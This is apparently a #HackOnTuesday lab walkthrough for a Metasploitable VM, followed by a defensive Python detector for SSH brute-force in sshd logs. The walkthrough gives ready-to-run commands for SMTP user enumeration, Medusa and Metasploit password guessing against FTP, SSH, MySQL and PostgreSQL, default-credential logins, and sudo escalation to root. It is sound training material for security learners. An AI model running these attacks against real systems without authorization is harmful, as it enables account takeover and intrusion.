Among the skills that a penetration tester must have there is the ability to attack passwords and crack hashes. In this episode of #HackOnTuesday, we go through some tools and techniques to attack weak passwords for the most common services such as FTP, Telnet and SSH, just to name a few. After having cracked several passwords, Gianni moves on and uses a common sudo misconfiguration to get root access on the Metasploitable VM.

Tools, Scripts, and Exploits

The tools, scripts, and exploits used in this episode of #HackOnTuesday are:

Steps

  • Identify the services listening on the target
    • nmap -v -sV 192.168.75.149 -p-
  • Test if VRFY, RCPT, or EXPN are enabled.
    • nc 192.168.75.149 25
    • RCPT TO:mike   # This returns an “Error: need MAIL command” message.
    • EXPN mike   # This returns an “Error: command not recognized” message.
    • VRFY mike # This returns a “Recipient address rejected” message.
    • VRFY root   # This works fine!
  • Enumerate the local users via SMTP
    • With Nmap:
      • nmap --script smtp-enum-users.nse 192.168.75.149   # In this case, we get a “Method RCPT returned a unhandled status code.” message. As seen before, the RCPT method returns an error.
    • With Metasploit:
      • msfconsole
      • use auxiliary/scanner/smtp/smtp_enum
      • show options
      • set RHOSTS 192.168.75.149
      • set USER_FILE /home/kusanagi/metasploitable/wordlists/usernames.txt
      • set THREADS 20
      • run
  • Attack the FTP service (port 21)
    • medusa -h 192.168.75.149 -U ftp_usernames.txt -P ftp_passwords.txt -e ns -M ftp -v 6 -t 10 -O ftp.log
    • ftp 192.168.75.149   # Username: msfadmin , Password: msfadmin
    • cd vulnerable
    • ls
    • exit
    • ftp 192.168.75.149   # Username: user, Password: user
    • ls
    • exit
  • Attack the SSH service (port 22)
    • medusa -h 192.168.75.149 -U ssh_usernames.txt -P ssh_passwords.txt -e ns -M ssh -t 10 -O ssh.log
  • Attack the Telnet service (port 23)
    • telnet 192.168.75.149
    • msfadmin/msfadmin   # or user/user
    • uname -a
  • Attack the MySQL service (port 3306)
    • msfconsole
    • search mysql
    • use auxiliary/scanner/mysql/mysql_login
    • show options
    • set RHOSTS 192.168.75.149
    • set USER_FILE /home/kusanagi/metasploitable/wordlists/mysql_usernames.txt
    • set PASS_FILE /home/kusanagi/metasploitable/wordlists/mysql_passwords.txt
    • set VERBOSE false   # If true, it may take twice as much time to find the password for long wordlists.
    • run
    • mysql -h 192.168.75.149 -u root -p   # Password: root
  • Attack the PostgreSQL service (port 5432)
    • msfconsole
    • search postgres
    • use auxiliary/scanner/postgres/postgres_login
    • show options
    • set RHOSTS 192.168.75.149
    • run
    • Open a new terminal and connect to the PostgreSQL Server
      • psql -h 192.168.75.149 -d template1 -U postgres -W
      • SELECT version();
      • \q
  • Escalate the privileges
    • ssh user@192.168.75.149
    • sudo -i   # This returns the “user is not in the sudoers file.” message.
    • exit
    • ssh msfadmin@192.168.75.149
    • sudo -i
    • whoami
  • Game over!
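
The defender's view of the password attacks above, added here as an example and not a script from the episode: it parses constructed sshd log lines (assumed syslog format, year 2024), flags any source that racks up five failed passwords within a minute, and marks the case where a success from the same source follows, which is what a medusa run like the one against port 22 looks like from the server side.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd lines; not captured from the episode's VM.
SAMPLE_LOG = """\
Mar  5 10:00:01 metasploitable sshd[2101]: Failed password for invalid user admin from 192.168.75.10 port 40112 ssh2
Mar  5 10:00:02 metasploitable sshd[2102]: Failed password for invalid user admin from 192.168.75.10 port 40113 ssh2
Mar  5 10:00:02 metasploitable sshd[2103]: Failed password for msfadmin from 192.168.75.10 port 40114 ssh2
Mar  5 10:00:03 metasploitable sshd[2104]: Failed password for user from 192.168.75.10 port 40115 ssh2
Mar  5 10:00:03 metasploitable sshd[2105]: Failed password for msfadmin from 192.168.75.10 port 40116 ssh2
Mar  5 10:00:04 metasploitable sshd[2106]: Accepted password for msfadmin from 192.168.75.10 port 40117 ssh2
Mar  5 10:02:30 metasploitable sshd[2140]: Failed password for msfadmin from 192.168.75.20 port 51000 ssh2
Mar  5 10:09:00 metasploitable sshd[2155]: Accepted password for msfadmin from 192.168.75.20 port 51001 ssh2
"""

# Matches both "Failed password for invalid user X" and "Failed/Accepted password for X".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

def parse(log_text, year=2024):
    """Yield (timestamp, result, user, src) for every sshd password event."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["src"]

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Return {src: alert} for sources with >= threshold failures inside a
    sliding window of window_s seconds. An 'Accepted' from the same source
    within the window after the burst sets success_user: that is the account
    to treat as compromised first, not just a noisy source to block."""
    failures = defaultdict(list)   # src -> timestamps of recent failures
    alerts = {}
    for ts, result, user, src in parse(log_text):
        if result == "Failed":
            recent = [t for t in failures[src] if (ts - t).total_seconds() <= window_s]
            recent.append(ts)
            failures[src] = recent
            if len(recent) >= threshold:
                alert = alerts.setdefault(src, {"failures": 0, "success_user": None})
                alert["failures"] = max(alert["failures"], len(recent))
        elif src in alerts and (ts - failures[src][-1]).total_seconds() <= window_s:
            alerts[src]["success_user"] = user
    return alerts
```

The second source (one failure, then a success minutes later) stays below the threshold, which keeps a single mistyped password from paging anyone.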
